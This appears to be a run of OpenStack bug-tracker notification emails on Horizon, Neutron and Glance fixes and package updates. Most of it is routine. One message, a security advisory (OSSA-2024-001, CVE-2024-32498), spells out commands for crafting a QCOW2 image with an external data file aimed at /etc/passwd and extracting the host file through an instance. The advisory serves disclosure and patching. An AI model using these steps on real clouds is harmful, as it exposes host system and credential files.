** Changed in: cloud-archive Status: Fix Released => Fix Committed -- You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to OpenStack Dashboard (Horizon). https://bugs.launchpad.net/bugs/2054799 Title: [SRU] Issue with Project administration at Cloud Admin level Status in Ubuntu Cloud Archive: Fix Committed Status in Ubuntu Cloud Archive antelope series: Fix Released Status in Ubuntu Cloud Archive bobcat series: Fix Released Status in Ubuntu Cloud Archive caracal series: Fix Released Status in Ubuntu Cloud Archive yoga series: Fix Released Status in Ubuntu Cloud Archive zed series: Won't Fix Status in OpenStack Dashboard (Horizon): Fix Released Status in horizon package in Ubuntu: Fix Released Status in horizon source package in Jammy: Fix Released Status in horizon source package in Mantic: Fix Released Status in horizon source package in Noble: Fix Released Status in horizon source package in Oracular: Fix Released Bug description: [Impact] We are not able to see the list of users and groups assigned to a project in Horizon. [Test Case] Please refer to [Test steps] section below. [Regression Potential] The fix ed768ab is already in the upstream main, stable/2024.1, stable/2023.2 branches, so it is a clean backport and might be helpful for deployments using dashboard. Regressions would likely manifest in the users/groups tabs when listing users. [Others] Original Bug Description Below === We are not able to see the list of users assigned to a project in Horizon. Scenario: - Log in as Cloud Admin - Set Domain Context (k8s) - Go to projects section - Click on project Permissions_Roles_Test - Go to Users Expectation: Get a table with the users assigned to this project. Result: Get an error - https://i.imgur.com/TminwUy.png [attached] [Test steps] 1, Create an ordinary openstack test env with horizon. 2, Prepared some test data (eg: one domain k8s, one project k8s, and one user k8s-admain with the role k8s-admin-role) openstack domain create k8s openstack role create k8s-admin-role openstack project create --domain k8s k8s openstack user create --project-domain k8s --project k8s --domain k8s --password password k8s-admin openstack role add --user k8s-admin --user-domain k8s --project k8s --project-domain k8s k8s-admin-role $ openstack role assignment list --project k8s --names ++---+---+-+++---+ | Role | User | Group | Project | Domain | System | Inherited | ++---+---+-+++---+ | k8s-admin-role | k8s-admin@k8s | | k8s@k8s ||| False | ++---+---+-+++---+ 3, Log in horizon dashboard with admin user(eg: admin/openstack/admin_domain). 4, Click 'Identity -> Domains' to set domain context to the domain 'k8s'. 5, Click 'Identity -> Project -> k8s project -> Users'. 6, This is the result, it said 'Unable to disaply the users of this project' - https://i.imgur.com/TminwUy.png 7, These are some logs ==> /var/log/apache2/error.log <== [Fri Feb 23 10:03:12.201024 2024] [wsgi:error] [pid 47342:tid 140254008985152] [remote 10.5.3.120:58978] Recoverable error: 'e900b8934d11458b8eb9db21671c1b11' ==> /var/log/apache2/ssl_access.log <== 10.5.3.120 - - [23/Feb/2024:10:03:11 +] "GET /identity/07123041ee0544e0ab32e50dde780afd/detail/?tab=project_details__users HTTP/1.1" 200 1125 "https://10.5.3.120/identity/07123041ee0544e0ab32e50dde780afd/detail/"; "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36" [Some Analyses] This action will call this function in horizon [1]. This function will firstly get a list of users (api.keystone.user_list) [2], then role assignment list (api.keystone.get_project_users_roles) [3]. Without setting domain context, this works fine. However, if setting domain context, the project displayed is in a different domain. The user list from [2] only contains users of the user's own domain, while the role assignment list [3] includes users in another domain since the project is in another domain. From horizon's debug log, here is an example of user list: {"users": [{"email": "juju@localhost", "id": "8cd8f92ac2f94149a91488ad66f02382", "name": "admin", "domain_id": "103a4eb1712f4eb9873240d5a7f66599", "enabled": true, "password_expires_at": null, "options": {}, "links": {"self": "https://192.168.1.59:5000/v3/users/8cd8f92ac2f94149a91488ad66f02382"}}], "links": {"next": null, "self": "https://192.168.1.59:5000/v3/users";, "previous": null}} Here is an example of role assignment list: {"role_assignments": [{"links": {"assignment": "https://192.168.1.59:5000/v3/pro
[Yahoo-eng-team] [Bug 2059809] Re: [OSSA-2024-001] Arbitrary file access through QCOW2 external data file (CVE-2024-32498)
** Changed in: cloud-archive Status: Fix Released => Fix Committed -- You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to Glance. https://bugs.launchpad.net/bugs/2059809 Title: [OSSA-2024-001] Arbitrary file access through QCOW2 external data file (CVE-2024-32498) Status in Cinder: Fix Released Status in Ubuntu Cloud Archive: Fix Committed Status in Ubuntu Cloud Archive antelope series: Fix Released Status in Ubuntu Cloud Archive bobcat series: Fix Released Status in Ubuntu Cloud Archive caracal series: Fix Released Status in Ubuntu Cloud Archive ussuri series: Fix Committed Status in Ubuntu Cloud Archive yoga series: Fix Released Status in Glance: Fix Released Status in OpenStack Compute (nova): Fix Released Status in OpenStack Security Advisory: Fix Released Bug description: OpenStack has security vulnerability in Nova or Glance, that allows an authenticated attacker to read arbitrary files. QCOW2 has two mechanisms to read from another file. The backing file issue was reported and fixed with OSSA-2015-014, but the external data file was not discovered. Steps to Reproduce: - Create a disk image: `qemu-img create -f qcow2 -o data_file=abcdefghigh,data_file_raw=on disk.qcow2 1G` with `abcdefghigh` a placeholder of the same length as the file to read. `qemu-img` will zero it. - Replace the filename in the disk image: `sed -i "s#abcdefghigh#/etc/passwd#" disk.qcow2`. - Upload/register the disk image: `openstack image create --disk-format qcow2 --container-format bare --file "disk.qcow2" --private "my-image"`. - Create a new instance: `openstack server create --flavor "nano" --image "my-image" "my-instance"`. With the non-bootable instance there might be two ways to continue: Option 1: - Derive a new image: `openstack server image create --name "my-leak" "my-instance"` - Download the image: `openstack image save --file "leak.qcow2" "my-leak"` - The file content starts at guest cluster 0 Option 2: (this is untested because I reproduced it only in a production system) - Reboot the instance in rescue mode: `openstack server rescue --image "cirros-0.6.2-x86_64-disk" "my-instance"`. - Go to the Dashboard, open the console of the instance and login to the instance. - Extract content from `/dev/sdb` with `cat /dev/sdb | fold -w 1024 | head -n 32`, `xxd -l 1024 -c 32 /dev/sdb` or similar methods. - It might be possible to write to the host file. If the disk image is mounted with `qemu-nbd`, writes go through to the external data file. To manage notifications about this bug go to: https://bugs.launchpad.net/cinder/+bug/2059809/+subscriptions -- Mailing list: https://launchpad.net/~yahoo-eng-team Post to : yahoo-eng-team@lists.launchpad.net Unsubscribe : https://launchpad.net/~yahoo-eng-team More help : https://help.launchpad.net/ListHelp
[Yahoo-eng-team] [Bug 1728031] Re: [SRU] Unable to change user password when ENFORCE_PASSWORD_CHECK is True
This bug was fixed in the package horizon - 4:23.2.0-0ubuntu2~cloud0 --- horizon (4:23.2.0-0ubuntu2~cloud0) jammy-antelope; urgency=medium . [ Rodrigo Barbieri ] * d/p/lp1728031.patch: Fix admin unable to reset user's password. (LP: #1728031) * d/p/lp2055409.patch: apply config OPENSTACK_INSTANCE_RETRIEVE_IP_ADDRESSES to the instance details page (LP: #2055409) . [ Zhang Hua ] * d/p/lp2054799.patch: Fix Users/Groups tab list when a domain context is set. (LP: #2054799) ** Changed in: cloud-archive/antelope Status: Fix Committed => Fix Released -- You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to OpenStack Dashboard (Horizon). https://bugs.launchpad.net/bugs/1728031 Title: [SRU] Unable to change user password when ENFORCE_PASSWORD_CHECK is True Status in Ubuntu Cloud Archive: New Status in Ubuntu Cloud Archive antelope series: Fix Released Status in Ubuntu Cloud Archive bobcat series: Fix Released Status in Ubuntu Cloud Archive yoga series: Fix Released Status in Ubuntu Cloud Archive zed series: Won't Fix Status in OpenStack Dashboard (Horizon): Fix Released Status in horizon package in Ubuntu: Fix Released Status in horizon source package in Jammy: Fix Released Status in horizon source package in Mantic: Fix Released Status in horizon source package in Noble: Fix Released Status in horizon source package in Oracular: Fix Released Bug description: After following the security hardening guidelines: https://docs.openstack.org/security-guide/dashboard/checklist.html#check-dashboard-09-is-enforce-password-check-set-to-true After this check is enabled Check-Dashboard-09: Is ENFORCE_PASSWORD_CHECK set to True The user password cannot be changed. The form submission fails by displaying that admin password is incorrect. The reason for this is in keystone.py in openstack_dashboard/api/keystone.py user_verify_admin_password method uses internal url to communicate with the keystone. line 500: endpoint = _get_endpoint_url(request, 'internalURL') This should be changed to adminURL === SRU Description === [Impact] Admins cannot change user's password as it gives an error saying that the admin's password is incorrect, despite being correct. There are 2 causes: 1) due to the lack of user_domain being specified when validating the admin's password, it will always fail if the admin is not registered in the "default" domain, because the user_domain defaults to "default" when not specified. 2) even if the admin user is registered in the "default" domain, it may fail due to the wrong endpoint being used in the request to validate the admin's password. The issues are fixed in 2 separate patches [1] and [2]. However, [2] is introducing a new config option, while [1] alone is also enough to fix the occurrence on some deployments. We are including only [1] in the SRU. [Test Plan] Part 1/2) Test case 1. Setting up the env, ensure ENFORCE_PASSWORD_CHECK is set to True 1a. Deploy openstack env with horizon/openstack-dashboard 1b. Set up admin user in a domain not named "default", such as "admin_domain". 1c. Set up any other user, such as demo. Preferably in the admin_domain as well for convenience. 2. Reproduce the bug 2a. Login as admin and navigate to Identity > Users 2b. On the far right-hand side of the demo user row, click the options button and select Change Password 2c. Type in any new password, repeat it below, and type in the admin password. Click Save and you should see a message "The admin password is incorrect" 3. Install package that contains the fixed code 4. Confirm fix 5a. Repeat steps 2a-2c 5b. The password should now be saved successfully Part 2/2) Expected failures Check that password changes will continue to fail in scenarios where it is expected to fail, such as: - admin password incorrect - user not authorized cases (comment #35) [Where problems could occur] The code is a 1-line change that was tested in upstream CI (without the addition of bug-specific functional tests) from master(Caracal) to stable/zed without any issue captured. No side effects or risks are foreseen. Usage of fix [1] has also been tested manually without fix [2] and still worked. Worst case scenario, the ability to change password that currently does not work will still not work, because the code change is isolated to the specific function that validates the authenticity of the password used. Regressions would likely manifest when trying to change user passwords. [Other Info] None. [1] https://review.opendev.org/c/openstack/horizon/+/913250 [2] https://review.opendev.org/c/openstack/horizon/+/844574 To manage notifications about this bug go to: https://bugs.launchpad.net/cloud-archive/+bug/1728031/+subscriptions -- Mail
[Yahoo-eng-team] [Bug 2054799] Re: [SRU] Issue with Project administration at Cloud Admin level
This bug was fixed in the package horizon - 4:23.2.0-0ubuntu2~cloud0 --- horizon (4:23.2.0-0ubuntu2~cloud0) jammy-antelope; urgency=medium . [ Rodrigo Barbieri ] * d/p/lp1728031.patch: Fix admin unable to reset user's password. (LP: #1728031) * d/p/lp2055409.patch: apply config OPENSTACK_INSTANCE_RETRIEVE_IP_ADDRESSES to the instance details page (LP: #2055409) . [ Zhang Hua ] * d/p/lp2054799.patch: Fix Users/Groups tab list when a domain context is set. (LP: #2054799) ** Changed in: cloud-archive/antelope Status: Fix Committed => Fix Released -- You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to OpenStack Dashboard (Horizon). https://bugs.launchpad.net/bugs/2054799 Title: [SRU] Issue with Project administration at Cloud Admin level Status in Ubuntu Cloud Archive: Fix Released Status in Ubuntu Cloud Archive antelope series: Fix Released Status in Ubuntu Cloud Archive bobcat series: Fix Released Status in Ubuntu Cloud Archive caracal series: Fix Released Status in Ubuntu Cloud Archive yoga series: Fix Released Status in Ubuntu Cloud Archive zed series: Won't Fix Status in OpenStack Dashboard (Horizon): Fix Released Status in horizon package in Ubuntu: Fix Released Status in horizon source package in Jammy: Fix Released Status in horizon source package in Mantic: Fix Released Status in horizon source package in Noble: Fix Released Status in horizon source package in Oracular: Fix Released Bug description: [Impact] We are not able to see the list of users and groups assigned to a project in Horizon. [Test Case] Please refer to [Test steps] section below. [Regression Potential] The fix ed768ab is already in the upstream main, stable/2024.1, stable/2023.2 branches, so it is a clean backport and might be helpful for deployments using dashboard. Regressions would likely manifest in the users/groups tabs when listing users. [Others] Original Bug Description Below === We are not able to see the list of users assigned to a project in Horizon. Scenario: - Log in as Cloud Admin - Set Domain Context (k8s) - Go to projects section - Click on project Permissions_Roles_Test - Go to Users Expectation: Get a table with the users assigned to this project. Result: Get an error - https://i.imgur.com/TminwUy.png [attached] [Test steps] 1, Create an ordinary openstack test env with horizon. 2, Prepared some test data (eg: one domain k8s, one project k8s, and one user k8s-admain with the role k8s-admin-role) openstack domain create k8s openstack role create k8s-admin-role openstack project create --domain k8s k8s openstack user create --project-domain k8s --project k8s --domain k8s --password password k8s-admin openstack role add --user k8s-admin --user-domain k8s --project k8s --project-domain k8s k8s-admin-role $ openstack role assignment list --project k8s --names ++---+---+-+++---+ | Role | User | Group | Project | Domain | System | Inherited | ++---+---+-+++---+ | k8s-admin-role | k8s-admin@k8s | | k8s@k8s ||| False | ++---+---+-+++---+ 3, Log in horizon dashboard with admin user(eg: admin/openstack/admin_domain). 4, Click 'Identity -> Domains' to set domain context to the domain 'k8s'. 5, Click 'Identity -> Project -> k8s project -> Users'. 6, This is the result, it said 'Unable to disaply the users of this project' - https://i.imgur.com/TminwUy.png 7, These are some logs ==> /var/log/apache2/error.log <== [Fri Feb 23 10:03:12.201024 2024] [wsgi:error] [pid 47342:tid 140254008985152] [remote 10.5.3.120:58978] Recoverable error: 'e900b8934d11458b8eb9db21671c1b11' ==> /var/log/apache2/ssl_access.log <== 10.5.3.120 - - [23/Feb/2024:10:03:11 +] "GET /identity/07123041ee0544e0ab32e50dde780afd/detail/?tab=project_details__users HTTP/1.1" 200 1125 "https://10.5.3.120/identity/07123041ee0544e0ab32e50dde780afd/detail/"; "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36" [Some Analyses] This action will call this function in horizon [1]. This function will firstly get a list of users (api.keystone.user_list) [2], then role assignment list (api.keystone.get_project_users_roles) [3]. Without setting domain context, this works fine. However, if setting domain context, the project displayed is in a different domain. The user list from [2] only contains users of the user's own domain, while the role assignment list [3] includes users in another domain since the project is in another domain. From horizon's debug log, here is an example of user list
[Yahoo-eng-team] [Bug 2055409] Re: [SRU] config OPENSTACK_INSTANCE_RETRIEVE_IP_ADDRESSES does not apply to instance detail page
This bug was fixed in the package horizon - 4:23.2.0-0ubuntu2~cloud0 --- horizon (4:23.2.0-0ubuntu2~cloud0) jammy-antelope; urgency=medium . [ Rodrigo Barbieri ] * d/p/lp1728031.patch: Fix admin unable to reset user's password. (LP: #1728031) * d/p/lp2055409.patch: apply config OPENSTACK_INSTANCE_RETRIEVE_IP_ADDRESSES to the instance details page (LP: #2055409) . [ Zhang Hua ] * d/p/lp2054799.patch: Fix Users/Groups tab list when a domain context is set. (LP: #2054799) ** Changed in: cloud-archive/antelope Status: Fix Committed => Fix Released -- You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to OpenStack Dashboard (Horizon). https://bugs.launchpad.net/bugs/2055409 Title: [SRU] config OPENSTACK_INSTANCE_RETRIEVE_IP_ADDRESSES does not apply to instance detail page Status in Ubuntu Cloud Archive: Fix Released Status in Ubuntu Cloud Archive antelope series: Fix Released Status in Ubuntu Cloud Archive bobcat series: Fix Released Status in Ubuntu Cloud Archive caracal series: Fix Released Status in Ubuntu Cloud Archive ussuri series: Fix Committed Status in Ubuntu Cloud Archive victoria series: Won't Fix Status in Ubuntu Cloud Archive wallaby series: Won't Fix Status in Ubuntu Cloud Archive xena series: Won't Fix Status in Ubuntu Cloud Archive yoga series: Fix Released Status in Ubuntu Cloud Archive zed series: Won't Fix Status in OpenStack Dashboard (Horizon): Fix Committed Status in horizon package in Ubuntu: Fix Released Status in horizon source package in Focal: Fix Released Status in horizon source package in Jammy: Fix Released Status in horizon source package in Mantic: Fix Released Status in horizon source package in Noble: Fix Released Status in horizon source package in Oracular: Fix Released Bug description: Setting the config option OPENSTACK_INSTANCE_RETRIEVE_IP_ADDRESSES to False successfully allows skipping neutron calls when loading the instance list page, therefore speeding up page loading. However, when clicking on an instance and loading the instance details page it still makes the neutron calls, taking a very long time. The usage of the config option in the code could be adjusted to also be used when loading the instance details page, thus speeding up the page loading there as well. === SRU Description === [Impact] Environments that have too many neutron (networking) ports are very slow to load the instance list and instance detail pages. The existing config OPENSTACK_INSTANCE_RETRIEVE_IP_ADDRESSES [1] can be set to False for not retrieving/displaying IP addresses (which requires the expensive/slow calls for neutron port list). That does speed up the loading of the _instance list_ page, but it's not applied to the _single instance_ detail page, which remains slow. By applying the config option when loading the instance detail page as well, we speed up instance detail page loading and we have minimal side effects / behavior changes, which are already the same seen when displaying the instance list anyway (see [1]): - IP addresses are not included in the detail page   (this is aligned with the option's desired goal). - Floating IP addresses (if used/available in the deployment)   may take a while to be visible, but a page reload helps [1]   (and users were already be subject to this in the list page):   """   Note that when disabling the query to neutron it takes some time   until associated floating IPs are visible in the project instance   table and users may reload the table to check them.   """ This admittedly introduces a behavior change, however in this case it seems arguably reasonable/acceptable for some reasons: - The _default behavior_ does not change, as the new change   is gated by the opt-in setting of config option to False. - The _opt-in behavior_ change (once option is set to False)   is aligned with the _existing_ behavior/goal of that option   (i.e., not to retrieve/display IP addresses _somewhere_,   just _extending_ it from instance _list_ to _details_ too). - Users opt into that option for it _to address the issue_   of slowness in Horizon when looking at instances (VMs),   but it actually _does not address it_ fully -- i.e., one   page (list) is addressed, but the other (details) is not.   This patch/change improves the behavior/does achieve the   intended goal (address slowness) in the details page too. - This change is already present in upstream and Noble LTS,   so users would eventually get to it during cloud upgrades. [Test case] 1. Setting up the env 1a. Deploy openstack env with horizon/openstack-dashboard 1b. Declare and set OPENSTACK_INSTANCE_RETRIEVE_IP_ADDRESSES to False in /etc/openstack-dashboard/local_settings.py and restart apache2 2. Prepare to re
[Yahoo-eng-team] [Bug 2008943] Please test proposed package
Hello Miro, or anyone else affected, Accepted neutron into wallaby-proposed. The package will build now and be available in the Ubuntu Cloud Archive in a few hours, and then in the -proposed repository. Please help us by testing this new package. To enable the -proposed repository: sudo add-apt-repository cloud-archive:wallaby-proposed sudo apt-get update Your feedback will aid us getting this update out to other Ubuntu users. If this package fixes the bug for you, please add a comment to this bug, mentioning the version of the package you tested, and change the tag from verification-wallaby-needed to verification-wallaby-done. If it does not fix the bug for you, please add a comment stating that, and change the tag to verification-wallaby-failed. In either case, details of your testing will help us make a better decision. Further information regarding the verification process can be found at https://wiki.ubuntu.com/QATeam/PerformingSRUVerification . Thank you in advance! ** Changed in: cloud-archive/wallaby Status: Fix Released => Fix Committed ** Tags added: verification-wallaby-needed -- You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to neutron. https://bugs.launchpad.net/bugs/2008943 Title: OVN DB Sync utility cannot find NB DB Port Group Status in Ubuntu Cloud Archive: Fix Released Status in Ubuntu Cloud Archive ussuri series: Fix Released Status in Ubuntu Cloud Archive victoria series: Fix Released Status in Ubuntu Cloud Archive wallaby series: Fix Committed Status in Ubuntu Cloud Archive xena series: Fix Released Status in neutron: In Progress Status in neutron package in Ubuntu: Fix Released Status in neutron source package in Focal: Fix Released Bug description: Runtime exception: ovsdbapp.backend.ovs_idl.idlutils.RowNotFound: Cannot find Port_Group with name=pg_aa9f203b_ec51_4893_9bda_cfadbff9f800 can occure while performing database sync between Neutron db and OVN NB db using neutron-ovn-db-sync-util. This exception occures when the `sync_networks_ports_and_dhcp_opts()` function ends up implicitly creating a new default security group for a tenant/project id. This is normally ok but the problem is that `sync_port_groups` was already called and thus the port_group does not exists in NB DB. When the `sync_acls()` is called later there is no port group found and exception occurs. Quick way to reproduce on ML2/OVN: - openstack project create test_project - openstack create network --project test_project test_network - openstack port delete $(openstack port list --network test_network -c ID -f value) # since this is an empty network only the metadata port should get listed and subsequently deleted - openstack security group delete test_project So now that you have a network without a metadata port in it and no default security group for the project/tenant that this network belongs to run neutron-ovn-db-sync-util --config-file /etc/neutron/neutron.conf --config-file /etc/neutron/plugins/ml2/ml2_conf.ini --ovn- neutron_sync_mode migrate The exeption should occur Here is a more realistic scenario how we can run into this with ML2/OVS to ML2/OVN migration. I am also including why the code runs into it. 1. ML2/OVS enviroment with a network but no default security group for the project/tenant associated with the network 2. Perform ML2/OVS to ML2/OVN migration. This migration process will run neutron-ovn-db-sync-util with --migrate 3. During the sync we first sync port groups[1] from Neutron DB to OVN DB 4. Then we sync network ports [2]. The process will detect that the network in question is not part of OVN NB. It will create that network in OVN NB db and along with that it will create a metadata port for it(OVN network requires metadataport). The Port_create call will implicitly notify _ensure_default_security_group_handler which will not find securty group for that tenant/project id and create one. Now you have a new security group with 4 new default security group rules. 5. When sync_acls[4] runs it will pick up those 4 new rules but commit to NB DB will fail since the port_group(aka security group) does not exists in NB DB [1] https://opendev.org/openstack/neutron/src/branch/master/neutron/plugins/ml2/drivers/ovn/mech_driver/ovsdb/ovn_db_sync.py#L104 [2] https://opendev.org/openstack/neutron/src/branch/master/neutron/plugins/ml2/drivers/ovn/mech_driver/ovsdb/ovn_db_sync.py#L10 [3] https://opendev.org/openstack/neutron/src/branch/master/neutron/db/securitygroups_db.py#L915 [4] https://opendev.org/openstack/neutron/src/branch/master/neutron/plugins/ml2/drivers/ovn/mech_driver/ovsdb/ovn_db_sync.py#L107 = Ubuntu SRU Details = [Impact] See bug description. [Test Case] Deploy openstack with OVN. Follow steps in "Quick way to reproduce on ML2/OVN" from bug description. [Where problems could occ
[Yahoo-eng-team] [Bug 2030773] Please test proposed package
Hello Lucas, or anyone else affected, Accepted neutron into wallaby-proposed. The package will build now and be available in the Ubuntu Cloud Archive in a few hours, and then in the -proposed repository. Please help us by testing this new package. To enable the -proposed repository: sudo add-apt-repository cloud-archive:wallaby-proposed sudo apt-get update Your feedback will aid us getting this update out to other Ubuntu users. If this package fixes the bug for you, please add a comment to this bug, mentioning the version of the package you tested, and change the tag from verification-wallaby-needed to verification-wallaby-done. If it does not fix the bug for you, please add a comment stating that, and change the tag to verification-wallaby-failed. In either case, details of your testing will help us make a better decision. Further information regarding the verification process can be found at https://wiki.ubuntu.com/QATeam/PerformingSRUVerification . Thank you in advance! ** Changed in: cloud-archive/wallaby Status: Fix Released => Fix Committed ** Tags added: verification-wallaby-needed -- You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to neutron. https://bugs.launchpad.net/bugs/2030773 Title: OVN DB Sync always logs warning messages about updating all router ports Status in Ubuntu Cloud Archive: Fix Released Status in Ubuntu Cloud Archive antelope series: Fix Released Status in Ubuntu Cloud Archive ussuri series: Fix Released Status in Ubuntu Cloud Archive victoria series: Fix Released Status in Ubuntu Cloud Archive wallaby series: Fix Committed Status in Ubuntu Cloud Archive xena series: Fix Released Status in Ubuntu Cloud Archive yoga series: Fix Released Status in Ubuntu Cloud Archive zed series: Fix Released Status in neutron: Fix Released Status in neutron package in Ubuntu: Fix Released Status in neutron source package in Focal: Fix Released Status in neutron source package in Jammy: Fix Released Status in neutron source package in Lunar: Fix Released Bug description: Reported at: https://bugzilla.redhat.com/show_bug.cgi?id=2225156 The ovn-db-sync script does not check if the router ports are actually out-of-sync before adding it to the list of ports that needs to be updated, this can create red herring problems by introducing an irrelevant piece of information [0] in the sync report (specially when ran in "log" mode) making the user think that the databases might be out-of-sync even when it is not. Looking at the code [1] we can see that the comment talks about checking the networks and ipv6_ra_configs changes but it does neither; instead, it adds every router port to the list of ports that needs to be updated. # We dont have to check for the networks and # ipv6_ra_configs values. Lets add it to the # update_lrport_list. If they are in sync, then # update_router_port will be a no-op. update_lrport_list.append(db_router_ports[lrport]) This LP is about changing this behavior and checking for such differences in the router ports before marking them to be updated. [0] 2023-07-24 11:46:31.391 952358 WARNING networking_ovn.ovn_db_sync [req-1081a8a6-82dd-431c-a2ab-f58741dc1677 - - - - -] Router Port port_id=f164c0f1-8ac8-4c45-bba9-8c723a30c701 needs to be updated for networks changed [1] https://github.com/openstack/neutron/blob/c453813d0664259c4da0d132f224be2eebe70072/neutron/plugins/ml2/drivers/ovn/mech_driver/ovsdb/ovn_db_sync.py#L553-L557 = Ubuntu SRU Details = [Impact] See bug description above. [Test Case] Deploy openstack with OVN and multiple routers. Run the ovn-db-sync script and ensure router ports that are not out of sync are not marked to be updated. [Where problems could occur] If the _is_router_port_changed() function had a bug there would be potential for ports to be filtered out that need updating. Presumably this is not the case, but that is a theoritical potential for where problems could occur. All of these patches have already landed in the corresponding upstream branches. To manage notifications about this bug go to: https://bugs.launchpad.net/cloud-archive/+bug/2030773/+subscriptions -- Mailing list: https://launchpad.net/~yahoo-eng-team Post to : yahoo-eng-team@lists.launchpad.net Unsubscribe : https://launchpad.net/~yahoo-eng-team More help : https://help.launchpad.net/ListHelp
[Yahoo-eng-team] [Bug 2032770] Please test proposed package
Hello Mustafa, or anyone else affected, Accepted neutron into wallaby-proposed. The package will build now and be available in the Ubuntu Cloud Archive in a few hours, and then in the -proposed repository. Please help us by testing this new package. To enable the -proposed repository: sudo add-apt-repository cloud-archive:wallaby-proposed sudo apt-get update Your feedback will aid us getting this update out to other Ubuntu users. If this package fixes the bug for you, please add a comment to this bug, mentioning the version of the package you tested, and change the tag from verification-wallaby-needed to verification-wallaby-done. If it does not fix the bug for you, please add a comment stating that, and change the tag to verification-wallaby-failed. In either case, details of your testing will help us make a better decision. Further information regarding the verification process can be found at https://wiki.ubuntu.com/QATeam/PerformingSRUVerification . Thank you in advance! ** Changed in: cloud-archive/wallaby Status: Fix Released => Fix Committed ** Tags added: verification-wallaby-needed -- You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to neutron. https://bugs.launchpad.net/bugs/2032770 Title: [SRU] [OVN] port creation with --enable-uplink-status-propagation does not work with OVN mechanism driver Status in Ubuntu Cloud Archive: Fix Released Status in Ubuntu Cloud Archive antelope series: Fix Released Status in Ubuntu Cloud Archive ussuri series: Fix Released Status in Ubuntu Cloud Archive victoria series: Fix Released Status in Ubuntu Cloud Archive wallaby series: Fix Committed Status in Ubuntu Cloud Archive xena series: Fix Released Status in Ubuntu Cloud Archive yoga series: Fix Released Status in Ubuntu Cloud Archive zed series: Fix Released Status in neutron: Fix Released Status in neutron package in Ubuntu: Fix Released Status in neutron source package in Focal: Fix Released Status in neutron source package in Jammy: Fix Released Status in neutron source package in Lunar: Fix Released Bug description: [Impact] This SRU is a backport of https://review.opendev.org/c/openstack/neutron/+/892895 to the respective Ubuntu and UCA releases. The patch is merged to all respective upstream branches (master & stable/[u,v,w,x,y,z,2023.1(a)]). This SRU intends to add the missing 'uplink-status-propagation' extension to ML2/OVN. This extension is already present and working in ML2/OVS, and it is supported by ML2/OVN but the extension is somehow not added to ML2/OVN. The patch simply adds the missing extension to the ML2/OVN too. The impact of this is visible for the deployments migrating from ML2/OVS to ML2/OVN. The following command fails to work on ML2/OVN: ``` openstack port create --network 8d30fb08-2c6a-42fd-98c4-223d345c8c4f --binding-profile trusted=true --enable-uplink-status-propagation --vnic-type direct aaa # BadRequestException: 400: Client Error for url: https://mycloud.example.com:9696/v2.0/ports, Unrecognized attribute(s) 'propagate_uplink_status' ``` The fix corrects this behavior by adding the missing extension. [Test Case] - Deploy a Focal/Yoga cloud: - ./generate-bundle.sh -s focal -r yoga --name test-focal-yoga-stack --run --ovn # After the dust settles - ./configure - source ./novarc - openstack port create --network --binding-profile trusted=true --enable-uplink-status-propagation --vnic-type direct aaa - It should fail with "BadRequestException: 400: Client Error for url: https://mycloud.example.com:9696/v2.0/ports, Unrecognized attribute(s) 'propagate_uplink_status'" To confirm the fix, repeat the scenario and observe that the error disappears and port creation succeeds. [Regression Potential] The patch is quite trivial and should not affect any deployment negatively. The extension is optional and disabled by default. To manage notifications about this bug go to: https://bugs.launchpad.net/cloud-archive/+bug/2032770/+subscriptions -- Mailing list: https://launchpad.net/~yahoo-eng-team Post to : yahoo-eng-team@lists.launchpad.net Unsubscribe : https://launchpad.net/~yahoo-eng-team More help : https://help.launchpad.net/ListHelp
[Yahoo-eng-team] [Bug 1955578] Re: OVN transaction could not be completed due to a race condition
This bug was fixed in the package neutron - 2:16.4.2-0ubuntu6.4~cloud0 --- neutron (2:16.4.2-0ubuntu6.4~cloud0) bionic-ussuri; urgency=medium . * New update for the Ubuntu Cloud Archive. . neutron (2:16.4.2-0ubuntu6.4) focal; urgency=medium . [ Corey Bryant ] * d/p/ovn-db-sync-continue-on-duplicate-normalise.patch: Cherry-picked from upstream to allow ovn_db_sync to continue on duplicate normalised CIDR (LP: #1961112). * d/p/ovn-db-sync-check-for-router-port-differences.patch: Cherry-picked from upstream to ensure router ports are marked for needing updates only if they have changed (LP: #2030773). * d/p/ovn-specify-port-type-if-router-port-when-updating.patch: Specify port type if it's a router port when updating to avoid port flapping (LP: #1955578). * d/p/fix-acl-sync-when-default-sg-group-created.patch: Cherry-picked form upstream to fix ACL sync when default security group is created (LP: #2008943). . [ Mustafa Kemal GILOR ] * d/p/add_uplink_status_propagation.patch: Add the 'uplink-status-propagation' extension to ML2/OVN (LP: #2032770). ** Changed in: cloud-archive/ussuri Status: Fix Committed => Fix Released -- You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to neutron. https://bugs.launchpad.net/bugs/1955578 Title: OVN transaction could not be completed due to a race condition Status in Ubuntu Cloud Archive: Fix Released Status in Ubuntu Cloud Archive ussuri series: Fix Released Status in Ubuntu Cloud Archive victoria series: Fix Released Status in neutron: Fix Released Status in neutron package in Ubuntu: Fix Released Status in neutron source package in Focal: Fix Released Bug description: When executing the test "test_connectivity_through_2_routers" it is highly possible to have a race condition: networking_ovn.common.exceptions.RevisionConflict: OVN revision number for {PORT_ID} (type: ports) is equal or higher than the given resource. Skipping update. Bugzilla reference: https://bugzilla.redhat.com/show_bug.cgi?id=1860448 = Ubuntu SRU Details = [Impact] See bug description. [Test Case] Deploy openstack with OVN. Run the test_connectivity_through_2_routers test from https://github.com/openstack/neutron-tempest-plugin. This could also be tested manually based on what that test does. Ensure the router port status is not set to DOWN at any point. [Where problems could occur] The existing bug could still occur if the assumpion that specifying the port type is not correct. Presumably this is not the case, but that is a theoritical potential for where problems could occur. All of these patches have already landed in the corresponding upstream branches. To manage notifications about this bug go to: https://bugs.launchpad.net/cloud-archive/+bug/1955578/+subscriptions -- Mailing list: https://launchpad.net/~yahoo-eng-team Post to : yahoo-eng-team@lists.launchpad.net Unsubscribe : https://launchpad.net/~yahoo-eng-team More help : https://help.launchpad.net/ListHelp
